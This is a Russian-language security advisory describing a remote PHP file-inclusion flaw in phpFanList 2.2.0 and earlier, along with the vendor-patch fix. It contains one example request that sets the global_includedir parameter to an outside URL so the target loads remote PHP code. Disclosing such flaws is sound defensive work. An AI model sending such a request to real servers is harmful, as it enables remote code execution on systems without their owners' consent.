PHP-инклюдинг в phpFanList

Дата публикации:
06.01.2006
Дата изменения:
05.04.2009
Всего просмотров:
2718
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpFanList 2.x
Уязвимые версии: phpFanList 2.2.0 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе.

Уязвимость существует из-за недостаточной фильтрации входных данных в переменной $settings['global_includedir']. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web севера. Пример:

http://www.xxx.com/phpfanlist/g_includes/admin.inc.php?action=edit&settings[
global_includedir]=http://my.ru/

URL производителя: www.phpfanlist.com

Решение: Установите исправление с сайта производителя.

Об уязвимости сообщил SKEx86ns (skex86ns@mail.ru).

или введите имя

CAPTCHA